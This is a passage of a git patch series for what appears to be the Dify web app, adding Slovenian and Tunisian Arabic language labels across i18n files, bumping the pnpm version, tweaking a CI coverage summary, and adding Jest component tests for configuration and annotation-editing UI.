'Hindi', trTR: 'Türkçe', faIR: 'Farsi', + slSI: 'Slovenian', + arTN: 'Tunisian Arabic', }, }, unit: { diff --git a/web/i18n/es-ES/common.ts b/web/i18n/es-ES/common.ts index 1972183946..38d4402fd2 100644 --- a/web/i18n/es-ES/common.ts +++ b/web/i18n/es-ES/common.ts @@ -103,6 +103,8 @@ const translation = { hiIN: 'Hindi', trTR: 'Turco', faIR: 'Persa', + slSI: 'Esloveno', + arTN: 'Árabe tunecino', }, }, unit: { diff --git a/web/i18n/fa-IR/common.ts b/web/i18n/fa-IR/common.ts index 40c1a57d24..62a2e2cec8 100644 --- a/web/i18n/fa-IR/common.ts +++ b/web/i18n/fa-IR/common.ts @@ -103,6 +103,8 @@ const translation = { hiIN: 'هندی', trTR: 'ترکی', faIR: 'فارسی', + slSI: 'اسلوونیایی', + arTN: 'عربی تونسی', }, }, unit: { diff --git a/web/i18n/fr-FR/common.ts b/web/i18n/fr-FR/common.ts index 525f3a28c0..da72b0497c 100644 --- a/web/i18n/fr-FR/common.ts +++ b/web/i18n/fr-FR/common.ts @@ -99,6 +99,8 @@ const translation = { hiIN: 'Hindi', trTR: 'Turc', faIR: 'Persan', + slSI: 'Slovène', + arTN: 'Arabe tunisien', }, }, unit: { diff --git a/web/i18n/hi-IN/common.ts b/web/i18n/hi-IN/common.ts index c6151f5988..fa25074b9c 100644 --- a/web/i18n/hi-IN/common.ts +++ b/web/i18n/hi-IN/common.ts @@ -103,6 +103,8 @@ const translation = { hiIN: 'हिन्दी', trTR: 'तुर्की', faIR: 'फ़ारसी', + slSI: 'स्लोवेनियाई', + arTN: 'ट्यूनीशियाई अरबी', }, }, unit: { diff --git a/web/i18n/id-ID/common.ts b/web/i18n/id-ID/common.ts index cac1696768..0c70b0341e 100644 --- a/web/i18n/id-ID/common.ts +++ b/web/i18n/id-ID/common.ts @@ -103,6 +103,8 @@ const translation = { viVN: 'Vietnam', ukUA: 'Ukraina', faIR: 'Farsi', + slSI: 'Bahasa Slovenia', + arTN: 'Bahasa Arab Tunisia', itIT: 'Italia', zhHant: 'Mandarin Tradisional', thTH: 'Thai', diff --git a/web/i18n/it-IT/common.ts b/web/i18n/it-IT/common.ts index d8eb7935bf..d5793bb902 100644 --- a/web/i18n/it-IT/common.ts +++ b/web/i18n/it-IT/common.ts @@ -103,6 +103,8 @@ const translation = { hiIN: 'Hindi', trTR: 'Turco', faIR: 'Persiano', + slSI: 'Sloveno', + arTN: 'Arabo tunisino', }, }, unit: { diff --git a/web/i18n/ja-JP/common.ts b/web/i18n/ja-JP/common.ts index 2f7bb13fb5..d4647fbc12 100644 --- a/web/i18n/ja-JP/common.ts +++ b/web/i18n/ja-JP/common.ts @@ -109,6 +109,8 @@ const translation = { hiIN: 'ヒンディー語', trTR: 'トルコ語', faIR: 'ペルシア語', + slSI: 'スロベニア語', + arTN: 'チュニジア・アラビア語', }, }, unit: { diff --git a/web/i18n/ko-KR/common.ts b/web/i18n/ko-KR/common.ts index 99ac7a2d70..805b9f9840 100644 --- a/web/i18n/ko-KR/common.ts +++ b/web/i18n/ko-KR/common.ts @@ -99,6 +99,8 @@ const translation = { hiIN: '힌디어', trTR: '터키어', faIR: '페르시아어', + slSI: '슬로베니아어', + arTN: '튀니지 아랍어', }, }, unit: { diff --git a/web/i18n/pl-PL/common.ts b/web/i18n/pl-PL/common.ts index 938208da34..2ecf18c7e6 100644 --- a/web/i18n/pl-PL/common.ts +++ b/web/i18n/pl-PL/common.ts @@ -99,6 +99,8 @@ const translation = { hiIN: 'Hindi', trTR: 'Turecki', faIR: 'Perski', + slSI: 'Słoweński', + arTN: 'Arabski tunezyjski', }, }, unit: { diff --git a/web/i18n/pt-BR/common.ts b/web/i18n/pt-BR/common.ts index 1a5c531535..d0838b4f09 100644 --- a/web/i18n/pt-BR/common.ts +++ b/web/i18n/pt-BR/common.ts @@ -99,6 +99,8 @@ const translation = { hiIN: 'Hindi', trTR: 'Turco', faIR: 'Persa', + slSI: 'Esloveno', + arTN: 'Árabe Tunisiano', }, }, unit: { diff --git a/web/i18n/ro-RO/common.ts b/web/i18n/ro-RO/common.ts index 4a5004ae2c..8b8ab9ac26 100644 --- a/web/i18n/ro-RO/common.ts +++ b/web/i18n/ro-RO/common.ts @@ -98,6 +98,8 @@ const translation = { hiIN: 'Hindi', trTR: 'Turcă', faIR: 'Persană', + slSI: 'Slovenă', + arTN: 'Arabă tunisiană', plPL: 'Poloneză', }, }, diff --git a/web/i18n/ru-RU/common.ts b/web/i18n/ru-RU/common.ts index 45ad5150e2..afc9368e9e 100644 --- a/web/i18n/ru-RU/common.ts +++ b/web/i18n/ru-RU/common.ts @@ -103,6 +103,8 @@ const translation = { hiIN: 'Хинди', trTR: 'Турецкий', faIR: 'Персидский', + slSI: 'Словенский', + arTN: 'Тунисский арабский', }, }, unit: { diff --git a/web/i18n/sl-SI/common.ts b/web/i18n/sl-SI/common.ts index ce898fb085..b024ace3be 100644 --- a/web/i18n/sl-SI/common.ts +++ b/web/i18n/sl-SI/common.ts @@ -103,6 +103,8 @@ const translation = { hiIN: 'Hindujščina', trTR: 'Turščina', faIR: 'Farsi', + slSI: 'Slovenščina', + arTN: 'Tunizijska arabščina', }, }, unit: { diff --git a/web/i18n/th-TH/common.ts b/web/i18n/th-TH/common.ts index 9e67c3559f..9c325e3781 100644 --- a/web/i18n/th-TH/common.ts +++ b/web/i18n/th-TH/common.ts @@ -103,6 +103,8 @@ const translation = { hiIN: 'ฮินดี', trTR: 'ตุรกี', faIR: 'ภาษาเปอร์เซีย', + slSI: 'ภาษาสโลเวเนีย', + arTN: 'ภาษาอาหรับตูนิเซีย', }, }, unit: { diff --git a/web/i18n/tr-TR/common.ts b/web/i18n/tr-TR/common.ts index f9d55265bf..8b0a7cba69 100644 --- a/web/i18n/tr-TR/common.ts +++ b/web/i18n/tr-TR/common.ts @@ -103,6 +103,8 @@ const translation = { hiIN: 'Hintçe', trTR: 'Türkçe', faIR: 'Farsça', + slSI: 'Slovence', + arTN: 'Tunus Arapçası', }, }, unit: { diff --git a/web/i18n/uk-UA/common.ts b/web/i18n/uk-UA/common.ts index be7186fca8..bd0f55c2f5 100644 --- a/web/i18n/uk-UA/common.ts +++ b/web/i18n/uk-UA/common.ts @@ -99,6 +99,8 @@ const translation = { hiIN: 'Хінді', trTR: 'Турецька', faIR: 'Перська', + slSI: 'Словенська', + arTN: 'Туніська арабська', }, }, unit: { diff --git a/web/i18n/vi-VN/common.ts b/web/i18n/vi-VN/common.ts index 2d30d3240e..8b1b69163e 100644 --- a/web/i18n/vi-VN/common.ts +++ b/web/i18n/vi-VN/common.ts @@ -99,6 +99,8 @@ const translation = { hiIN: 'Tiếng Hindi', trTR: 'Tiếng Thổ Nhĩ Kỳ', faIR: 'Tiếng Ba Tư', + slSI: 'Tiếng Slovenia', + arTN: 'Tiếng Ả Rập Tunisia', }, }, unit: { diff --git a/web/i18n/zh-Hans/common.ts b/web/i18n/zh-Hans/common.ts index 7bb1bff826..8e7103564f 100644 --- a/web/i18n/zh-Hans/common.ts +++ b/web/i18n/zh-Hans/common.ts @@ -113,6 +113,8 @@ const translation = { hiIN: '印地语', trTR: '土耳其语', faIR: '波斯语', + slSI: '斯洛文尼亚语', + arTN: '突尼斯阿拉伯语', }, }, unit: { diff --git a/web/i18n/zh-Hant/common.ts b/web/i18n/zh-Hant/common.ts index 1b1d222845..1a72a083d8 100644 --- a/web/i18n/zh-Hant/common.ts +++ b/web/i18n/zh-Hant/common.ts @@ -99,6 +99,8 @@ const translation = { hiIN: '印地語', trTR: '土耳其語', faIR: '波斯語', + slSI: '斯洛維尼亞語', + arTN: '突尼西亞阿拉伯語', }, }, unit: { diff --git a/web/package.json b/web/package.json index c5dbf0a07d..961288b495 100644 --- a/web/package.json +++ b/web/package.json @@ -2,7 +2,7 @@ "name": "dify-web", "version": "1.11.1", "private": true, - "packageManager": "pnpm@10.25.0+sha512.5e82639027af37cf832061bcc6d639c219634488e0f2baebe785028a793de7b525ffcd3f7ff574f5e9860654e098fe852ba8ac5dd5cefe1767d23a020a92f501", + "packageManager": "pnpm@10.26.0+sha512.3b3f6c725ebe712506c0ab1ad4133cf86b1f4b687effce62a9b38b4d72e3954242e643190fc51fa1642949c735f403debd44f5cb0edd657abe63a8b6a7e1e402", "engines": { "node": ">=v22.11.0" }, @@ -288,4 +288,4 @@ "sharp" ] } -} \ No newline at end of file +} From 4a1ddea43195fbd8fd863c2281f960d4308cd73e Mon Sep 17 00:00:00 2001 From: -LAN- Date: Wed, 17 Dec 2025 10:18:41 +0800 Subject: [PATCH 61/68] ci: show missing lines in coverage report summary (#29717) --- .github/workflows/api-tests.yml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/.github/workflows/api-tests.yml b/.github/workflows/api-tests.yml index ab7878dc64..76cbf64fca 100644 --- a/.github/workflows/api-tests.yml +++ b/.github/workflows/api-tests.yml @@ -93,4 +93,12 @@ jobs: # Create a detailed coverage summary echo "### Test Coverage Summary :test_tube:" >> $GITHUB_STEP_SUMMARY echo "Total Coverage: ${TOTAL_COVERAGE}%" >> $GITHUB_STEP_SUMMARY - uv run --project api coverage report --format=markdown >> $GITHUB_STEP_SUMMARY + { + echo "" + echo "
File-level coverage (click to expand)" + echo "" + echo '```' + uv run --project api coverage report -m + echo '```' + echo "
" + } >> $GITHUB_STEP_SUMMARY From 232149e63fda9ec4001c60706b5584a2c72a0feb Mon Sep 17 00:00:00 2001 From: yyh <92089059+lyzno1@users.noreply.github.com> Date: Wed, 17 Dec 2025 10:19:10 +0800 Subject: [PATCH 62/68] chore: add tests for config string and dataset card item (#29743) --- .../config-var/config-string/index.spec.tsx | 121 +++++++++ .../dataset-config/card-item/index.spec.tsx | 242 ++++++++++++++++++ 2 files changed, 363 insertions(+) create mode 100644 web/app/components/app/configuration/config-var/config-string/index.spec.tsx create mode 100644 web/app/components/app/configuration/dataset-config/card-item/index.spec.tsx diff --git a/web/app/components/app/configuration/config-var/config-string/index.spec.tsx b/web/app/components/app/configuration/config-var/config-string/index.spec.tsx new file mode 100644 index 0000000000..e98a8dc53d --- /dev/null +++ b/web/app/components/app/configuration/config-var/config-string/index.spec.tsx @@ -0,0 +1,121 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import ConfigString, { type IConfigStringProps } from './index' + +const renderConfigString = (props?: Partial) => { + const onChange = jest.fn() + const defaultProps: IConfigStringProps = { + value: 5, + maxLength: 10, + modelId: 'model-id', + onChange, + } + + render() + + return { onChange } +} + +describe('ConfigString', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render numeric input with bounds', () => { + renderConfigString({ value: 3, maxLength: 8 }) + + const input = screen.getByRole('spinbutton') + + expect(input).toHaveValue(3) + expect(input).toHaveAttribute('min', '1') + expect(input).toHaveAttribute('max', '8') + }) + + it('should render empty input when value is undefined', () => { + const { onChange } = renderConfigString({ value: undefined }) + + expect(screen.getByRole('spinbutton')).toHaveValue(null) + expect(onChange).not.toHaveBeenCalled() + }) + }) + + describe('Effect behavior', () => { + it('should clamp initial value to maxLength when it exceeds limit', async () => { + const onChange = jest.fn() + render( + , + ) + + await waitFor(() => { + expect(onChange).toHaveBeenCalledWith(10) + }) + expect(onChange).toHaveBeenCalledTimes(1) + }) + + it('should clamp when updated prop value exceeds maxLength', async () => { + const onChange = jest.fn() + const { rerender } = render( + , + ) + + rerender( + , + ) + + await waitFor(() => { + expect(onChange).toHaveBeenCalledWith(6) + }) + expect(onChange).toHaveBeenCalledTimes(1) + }) + }) + + describe('User interactions', () => { + it('should clamp entered value above maxLength', () => { + const { onChange } = renderConfigString({ maxLength: 7 }) + + fireEvent.change(screen.getByRole('spinbutton'), { target: { value: '12' } }) + + expect(onChange).toHaveBeenCalledWith(7) + }) + + it('should raise value below minimum to one', () => { + const { onChange } = renderConfigString() + + fireEvent.change(screen.getByRole('spinbutton'), { target: { value: '0' } }) + + expect(onChange).toHaveBeenCalledWith(1) + }) + + it('should forward parsed value when within bounds', () => { + const { onChange } = renderConfigString({ maxLength: 9 }) + + fireEvent.change(screen.getByRole('spinbutton'), { target: { value: '7' } }) + + expect(onChange).toHaveBeenCalledWith(7) + }) + + it('should pass through NaN when input is cleared', () => { + const { onChange } = renderConfigString() + + fireEvent.change(screen.getByRole('spinbutton'), { target: { value: '' } }) + + expect(onChange).toHaveBeenCalledTimes(1) + expect(onChange.mock.calls[0][0]).toBeNaN() + }) + }) +}) diff --git a/web/app/components/app/configuration/dataset-config/card-item/index.spec.tsx b/web/app/components/app/configuration/dataset-config/card-item/index.spec.tsx new file mode 100644 index 0000000000..4d92ae4080 --- /dev/null +++ b/web/app/components/app/configuration/dataset-config/card-item/index.spec.tsx @@ -0,0 +1,242 @@ +import { fireEvent, render, screen, waitFor, within } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Item from './index' +import type React from 'react' +import type { DataSet } from '@/models/datasets' +import { ChunkingMode, DataSourceType, DatasetPermission } from '@/models/datasets' +import type { IndexingType } from '@/app/components/datasets/create/step-two' +import type { RetrievalConfig } from '@/types/app' +import { RETRIEVE_METHOD } from '@/types/app' +import useBreakpoints, { MediaType } from '@/hooks/use-breakpoints' + +jest.mock('../settings-modal', () => ({ + __esModule: true, + default: ({ onSave, onCancel, currentDataset }: any) => ( +
+
Mock settings modal
+ + +
+ ), +})) + +jest.mock('@/hooks/use-breakpoints', () => { + const actual = jest.requireActual('@/hooks/use-breakpoints') + return { + __esModule: true, + ...actual, + default: jest.fn(() => actual.MediaType.pc), + } +}) + +const mockedUseBreakpoints = useBreakpoints as jest.MockedFunction + +const baseRetrievalConfig: RetrievalConfig = { + search_method: RETRIEVE_METHOD.semantic, + reranking_enable: false, + reranking_model: { + reranking_provider_name: 'provider', + reranking_model_name: 'rerank-model', + }, + top_k: 4, + score_threshold_enabled: false, + score_threshold: 0, +} + +const defaultIndexingTechnique: IndexingType = 'high_quality' as IndexingType + +const createDataset = (overrides: Partial = {}): DataSet => { + const { + retrieval_model, + retrieval_model_dict, + icon_info, + ...restOverrides + } = overrides + + const resolvedRetrievalModelDict = { + ...baseRetrievalConfig, + ...retrieval_model_dict, + } + const resolvedRetrievalModel = { + ...baseRetrievalConfig, + ...(retrieval_model ?? retrieval_model_dict), + } + + const defaultIconInfo = { + icon: '📘', + icon_type: 'emoji', + icon_background: '#FFEAD5', + icon_url: '', + } + + const resolvedIconInfo = ('icon_info' in overrides) + ? icon_info + : defaultIconInfo + + return { + id: 'dataset-id', + name: 'Dataset Name', + indexing_status: 'completed', + icon_info: resolvedIconInfo as DataSet['icon_info'], + description: 'A test dataset', + permission: DatasetPermission.onlyMe, + data_source_type: DataSourceType.FILE, + indexing_technique: defaultIndexingTechnique, + author_name: 'author', + created_by: 'creator', + updated_by: 'updater', + updated_at: 0, + app_count: 0, + doc_form: ChunkingMode.text, + document_count: 0, + total_document_count: 0, + total_available_documents: 0, + word_count: 0, + provider: 'dify', + embedding_model: 'text-embedding', + embedding_model_provider: 'openai', + embedding_available: true, + retrieval_model_dict: resolvedRetrievalModelDict, + retrieval_model: resolvedRetrievalModel, + tags: [], + external_knowledge_info: { + external_knowledge_id: 'external-id', + external_knowledge_api_id: 'api-id', + external_knowledge_api_name: 'api-name', + external_knowledge_api_endpoint: 'https://endpoint', + }, + external_retrieval_model: { + top_k: 2, + score_threshold: 0.5, + score_threshold_enabled: true, + }, + built_in_field_enabled: true, + doc_metadata: [], + keyword_number: 3, + pipeline_id: 'pipeline-id', + is_published: true, + runtime_mode: 'general', + enable_api: true, + is_multimodal: false, + ...restOverrides, + } +} + +const renderItem = (config: DataSet, props?: Partial>) => { + const onSave = jest.fn() + const onRemove = jest.fn() + + render( + , + ) + + return { onSave, onRemove } +} + +describe('dataset-config/card-item', () => { + beforeEach(() => { + jest.clearAllMocks() + mockedUseBreakpoints.mockReturnValue(MediaType.pc) + }) + + it('should render dataset details with indexing and external badges', () => { + const dataset = createDataset({ + provider: 'external', + retrieval_model_dict: { + ...baseRetrievalConfig, + search_method: RETRIEVE_METHOD.semantic, + }, + }) + + renderItem(dataset) + + const card = screen.getByText(dataset.name).closest('.group') as HTMLElement + const actionButtons = within(card).getAllByRole('button', { hidden: true }) + + expect(screen.getByText(dataset.name)).toBeInTheDocument() + expect(screen.getByText('dataset.indexingTechnique.high_quality · dataset.indexingMethod.semantic_search')).toBeInTheDocument() + expect(screen.getByText('dataset.externalTag')).toBeInTheDocument() + expect(actionButtons).toHaveLength(2) + }) + + it('should open settings drawer from edit action and close after saving', async () => { + const user = userEvent.setup() + const dataset = createDataset() + const { onSave } = renderItem(dataset) + + const card = screen.getByText(dataset.name).closest('.group') as HTMLElement + const [editButton] = within(card).getAllByRole('button', { hidden: true }) + await user.click(editButton) + + expect(screen.getByText('Mock settings modal')).toBeInTheDocument() + await waitFor(() => { + expect(screen.getByRole('dialog')).toBeVisible() + }) + + await user.click(screen.getByText('Save changes')) + + await waitFor(() => { + expect(onSave).toHaveBeenCalledWith(expect.objectContaining({ name: 'Updated dataset' })) + }) + await waitFor(() => { + expect(screen.getByText('Mock settings modal')).not.toBeVisible() + }) + }) + + it('should call onRemove and toggle destructive state on hover', async () => { + const user = userEvent.setup() + const dataset = createDataset() + const { onRemove } = renderItem(dataset) + + const card = screen.getByText(dataset.name).closest('.group') as HTMLElement + const buttons = within(card).getAllByRole('button', { hidden: true }) + const deleteButton = buttons[buttons.length - 1] + + expect(deleteButton.className).not.toContain('action-btn-destructive') + + fireEvent.mouseEnter(deleteButton) + expect(deleteButton.className).toContain('action-btn-destructive') + expect(card.className).toContain('border-state-destructive-border') + + fireEvent.mouseLeave(deleteButton) + expect(deleteButton.className).not.toContain('action-btn-destructive') + + await user.click(deleteButton) + expect(onRemove).toHaveBeenCalledWith(dataset.id) + }) + + it('should use default icon information when icon details are missing', () => { + const dataset = createDataset({ icon_info: undefined }) + + renderItem(dataset) + + const nameElement = screen.getByText(dataset.name) + const iconElement = nameElement.parentElement?.firstElementChild as HTMLElement + + expect(iconElement).toHaveStyle({ background: '#FFF4ED' }) + expect(iconElement.querySelector('em-emoji')).toHaveAttribute('id', '📙') + }) + + it('should apply mask overlay on mobile when drawer is open', async () => { + mockedUseBreakpoints.mockReturnValue(MediaType.mobile) + const user = userEvent.setup() + const dataset = createDataset() + + renderItem(dataset) + + const card = screen.getByText(dataset.name).closest('.group') as HTMLElement + const [editButton] = within(card).getAllByRole('button', { hidden: true }) + await user.click(editButton) + expect(screen.getByText('Mock settings modal')).toBeInTheDocument() + + const overlay = Array.from(document.querySelectorAll('[class]')) + .find(element => element.className.toString().includes('bg-black/30')) + + expect(overlay).toBeInTheDocument() + }) +}) From 91714ee41382ca348066ca0a97197286ce78b1bd Mon Sep 17 00:00:00 2001 From: yyh <92089059+lyzno1@users.noreply.github.com> Date: Wed, 17 Dec 2025 10:21:32 +0800 Subject: [PATCH 63/68] chore(web): add some jest tests (#29754) --- .../edit-item/index.spec.tsx | 397 +++++++++++++++++ .../edit-annotation-modal/index.spec.tsx | 408 ++++++++++++++++++ .../dataset-config/context-var/index.spec.tsx | 299 +++++++++++++ .../context-var/var-picker.spec.tsx | 392 +++++++++++++++++ 4 files changed, 1496 insertions(+) create mode 100644 web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx create mode 100644 web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx create mode 100644 web/app/components/app/configuration/dataset-config/context-var/index.spec.tsx create mode 100644 web/app/components/app/configuration/dataset-config/context-var/var-picker.spec.tsx diff --git a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..1f32e55928 --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,397 @@ +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import EditItem, { EditItemType, EditTitle } from './index' + +describe('EditTitle', () => { + it('should render title content correctly', () => { + // Arrange + const props = { title: 'Test Title' } + + // Act + render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + // Should contain edit icon (svg element) + expect(document.querySelector('svg')).toBeInTheDocument() + }) + + it('should apply custom className when provided', () => { + // Arrange + const props = { + title: 'Test Title', + className: 'custom-class', + } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + expect(container.querySelector('.custom-class')).toBeInTheDocument() + }) +}) + +describe('EditItem', () => { + const defaultProps = { + type: EditItemType.Query, + content: 'Test content', + onSave: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render content correctly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + // Should show item name (query or answer) + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + + it('should render different item types correctly', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Answer, + content: 'Answer content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/answer content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.answerName')).toBeInTheDocument() + }) + + it('should show edit controls when not readonly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should hide edit controls when readonly', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should respect readonly prop for edit functionality', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + + it('should display provided content', () => { + // Arrange + const props = { + ...defaultProps, + content: 'Custom content for testing', + } + + // Act + render() + + // Assert + expect(screen.getByText(/custom content for testing/i)).toBeInTheDocument() + }) + + it('should render appropriate content based on type', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Query, + content: 'Question content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/question content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should activate edit mode when edit button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + // Assert + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.cancel' })).toBeInTheDocument() + }) + + it('should save new content when save button is clicked', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + // Type new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Updated content') + }) + + it('should exit edit mode when cancel button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText(/test content/i)).toBeInTheDocument() + }) + + it('should show content preview while typing', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.type(textarea, 'New content') + + // Assert + expect(screen.getByText(/new content/i)).toBeInTheDocument() + }) + + it('should call onSave with correct content when saving', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Test save content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Test save content') + }) + + it('should show delete option when content changes', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Enter edit mode and change content + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified content') + + // Save to trigger content change + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Modified content') + }) + + it('should handle keyboard interactions in edit mode', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + + // Test typing + await user.type(textarea, 'Keyboard test') + + // Assert + expect(textarea).toHaveValue('Keyboard test') + expect(screen.getByText(/keyboard test/i)).toBeInTheDocument() + }) + }) + + // State Management + describe('State Management', () => { + it('should reset newContent when content prop changes', async () => { + // Arrange + const { rerender } = render() + + // Act - Enter edit mode and type something + const user = userEvent.setup() + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New content') + + // Rerender with new content prop + rerender() + + // Assert - Textarea value should be reset due to useEffect + expect(textarea).toHaveValue('') + }) + + it('should preserve edit state across content changes', async () => { + // Arrange + const { rerender } = render() + const user = userEvent.setup() + + // Act - Enter edit mode + await user.click(screen.getByText('common.operation.edit')) + + // Rerender with new content + rerender() + + // Assert - Should still be in edit mode + expect(screen.getByRole('textbox')).toBeInTheDocument() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty content', () => { + // Arrange + const props = { + ...defaultProps, + content: '', + } + + // Act + const { container } = render() + + // Assert - Should render without crashing + // Check that the component renders properly with empty content + expect(container.querySelector('.grow')).toBeInTheDocument() + // Should still show edit button + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + // Arrange + const longContent = 'A'.repeat(1000) + const props = { + ...defaultProps, + content: longContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(longContent)).toBeInTheDocument() + }) + + it('should handle content with special characters', () => { + // Arrange + const specialContent = 'Content with & < > " \' characters' + const props = { + ...defaultProps, + content: specialContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialContent)).toBeInTheDocument() + }) + + it('should handle rapid edit/cancel operations', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + // Rapid edit/cancel operations + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByText('common.operation.cancel')) + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByText('common.operation.cancel')) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText('Test content')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..a2e2527605 --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx @@ -0,0 +1,408 @@ +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Toast, { type IToastProps, type ToastHandle } from '@/app/components/base/toast' +import EditAnnotationModal from './index' + +// Mock only external dependencies +jest.mock('@/service/annotation', () => ({ + addAnnotation: jest.fn(), + editAnnotation: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: { + usage: { annotatedResponse: 5 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: true, + }), +})) + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: () => '2023-12-01 10:30:00', + }), +})) + +// Note: i18n is automatically mocked by Jest via __mocks__/react-i18next.ts + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
, +})) + +type ToastNotifyProps = Pick +type ToastWithNotify = typeof Toast & { notify: (props: ToastNotifyProps) => ToastHandle } +const toastWithNotify = Toast as unknown as ToastWithNotify +const toastNotifySpy = jest.spyOn(toastWithNotify, 'notify').mockReturnValue({ clear: jest.fn() }) + +const { addAnnotation: mockAddAnnotation, editAnnotation: mockEditAnnotation } = jest.requireMock('@/service/annotation') as { + addAnnotation: jest.Mock + editAnnotation: jest.Mock +} + +describe('EditAnnotationModal', () => { + const defaultProps = { + isShow: true, + onHide: jest.fn(), + appId: 'test-app-id', + query: 'Test query', + answer: 'Test answer', + onEdited: jest.fn(), + onAdded: jest.fn(), + onRemove: jest.fn(), + } + + afterAll(() => { + toastNotifySpy.mockRestore() + }) + + beforeEach(() => { + jest.clearAllMocks() + mockAddAnnotation.mockResolvedValue({ + id: 'test-id', + account: { name: 'Test User' }, + }) + mockEditAnnotation.mockResolvedValue({}) + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render modal when isShow is true', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Check for modal title as it appears in the mock + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should not render modal when isShow is false', () => { + // Arrange + const props = { ...defaultProps, isShow: false } + 